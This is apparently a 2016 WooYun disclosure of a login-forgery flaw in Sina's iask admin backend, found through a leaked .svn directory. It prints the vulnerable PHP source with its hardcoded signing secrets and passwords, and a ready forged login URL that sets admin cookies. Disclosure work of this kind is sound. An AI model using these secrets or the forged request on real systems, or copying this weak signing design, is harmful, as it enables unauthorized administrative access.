当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170890

漏洞标题:新浪综合管理后台存在高危设计缺陷可获取管理权限(敏感词的添加/删除/修改等操作)

相关厂商:新浪

漏洞作者: HackBraid

提交时间:2016-01-18 17:03

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-18: 细节已通知厂商并且等待厂商处理中
2016-01-18: 厂商已经确认,细节仅向厂商公开
2016-01-28: 细节向核心白帽子及相关领域专家公开
2016-02-07: 细节向普通白帽子公开
2016-02-17: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

RT
敏感词库的权限,weibo那次传播**广告是不是也是这个原因呢?

详细说明:

源:
http://admin.iask.sina.com.cn/.svn/entries信息泄漏漏洞(目前已修补)
看源码,发现一个地方可以伪造登陆;
/api/login.php处源码如下:

<?php
ini_set('session.cookie_domain', ".iask.sina.com.cn");
error_reporting(E_ALL);
ini_set('display_errors', 1);
define('COOKIE_DOMAIN', '.admin.iask.sina.com.cn');
include('/data4/adminManage/conf/adminconf.php');
session_start();
$appmap = array(
	1000=>'d420915821e92b6559478b446445d172',
	1001=>'d420915821e92b6559478b446445d171',
);
$appuser = array(
	1000=>array('user'=>'weibo_zhishi', 'pw'=>'123456'),
	1001=>array('user'=>'baby_zhishi', 'pw'=>'123456'),
);
$appto = array(
	1000=>'http://admin.iask.sina.com.cn/audit/ishare_audit.php?action=indexapp',
	1001=>'http://admin.iask.sina.com.cn/audit/ishare_audit.php?action=indexapp',
);
$appgroup = array(
	1000=>array(7, 8, 10),
	1001=>array(16),
);
$appid = isset($_GET['appid']) ? intval($_GET['appid']) : 0;
$sign = isset($_GET['sign']) ? $_GET['sign'] : '';
$time = isset($_GET['time']) ? intval($_GET['time']) : 0;
$ip = isset($_GET['ip']) ? $_GET['ip'] : '';
$user = isset($_GET['user']) ? $_GET['user'] : '';
//下面的判断可以通过设置好参数来绕过,appid这里使用1000
if(!$appid||!$sign||!$time||!$ip||!$user||!isset($appmap[$appid])||!isset($appuser[$appid])) {
	exit('1001');
}
//time()函数,底下的exit注释掉了 - -!
if($time<time()-10*60) {
	//exit('1002');
}
$rip = lip::get_real_ip();
//底下的exit注释掉了 - -!
if($rip!=$ip) {
	//exit('1003');
}
error_log($rip.'-'.$ip."\n", 3, '/tmp/apip.log');
//这里可以自己伪造了~~~222333~~~
$sign_me = substr(md5($appid.$user.$time.$ip.$appmap[$appid]), 3, 16);
if($sign_me!=$sign) {
	exit('1004');
}
$username = $appuser[$appid];
global $db_admin;
$userDB = new admin_userDB($db_admin);
$rs = $userDB->check_password($appuser[$appid]['user'], $appuser[$appid]['pw'],true);
//设置cookie字段说明可以登录
if(is_array($rs)) {
	set_cookie("userid"      , $rs['uid']);
	set_cookie("username"    , $rs['uname']);
	set_cookie("name"        , 'supe');
	set_cookie("gname"       , $rs['gname']);
	set_cookie("gid"         , $rs['gid']);
	set_cookie("menuids_admin"     , $rs['menuid']);
	if(!$_COOKIE['lastlogintime']) {
		$_COOKIE['lastlogintime'] = date('Y-m-d H:i:s');
		set_cookie("lastlogintime" , $_COOKIE['lastlogintime']);
	}
} else {
	exit('1005');
}
$_SESSION['audit']['app']['username'] = $user;
$_SESSION['audit']['app']['group'] = $appgroup[$appid];
$result = 1000;
if(isset($_GET['location'])&&$_GET['location']==1) {
	$result = "<script>window.location.href='{$appto[$appid]}'</script>";
}
exit("$result");
function set_cookie($cname , $cval) {
	setcookie($cname , $cval , 0 , "/" , COOKIE_DOMAIN);
}

漏洞证明:

证明一下:
http://admin.iask.sina.com.cn/api/login.php?appid=1000&sign=13f069bbd9f3ab16&time=1554091094&ip=8.8.8.8&user=weibo_zhishi

weibo.png


看下成功设置了cookie:
http://admin.iask.sina.com.cn/api/print.php

weibo1.png


http://admin.iask.sina.com.cn/filter/set_sensitive_vocabulary.php?type=%C8%AB%B2%BF&level=%C8%AB%B2%BF&own=&word=&Submit=%B2%E9%D5%D2关键词的修改删除操作:

weibo2.png


这些是什么关键词呢?应该是敏感词库!还能更新~~222333
http://admin.iask.sina.com.cn/filter/control_set_for_ishare_content.php

weibo3.png


http://admin.iask.sina.com.cn/filter/ishare_title_red.php

weibo4.png

修复方案:

权限控制

版权声明:转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-01-18 17:19

厂商回复:

感谢关注新浪安全,安全问题修复中。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-01-18 17:17 | 坏男孩-A_A ( 实习白帽子 | Rank:37 漏洞数:17 | 膜拜学习中)

    隔壁太牛鼻,近来躲躲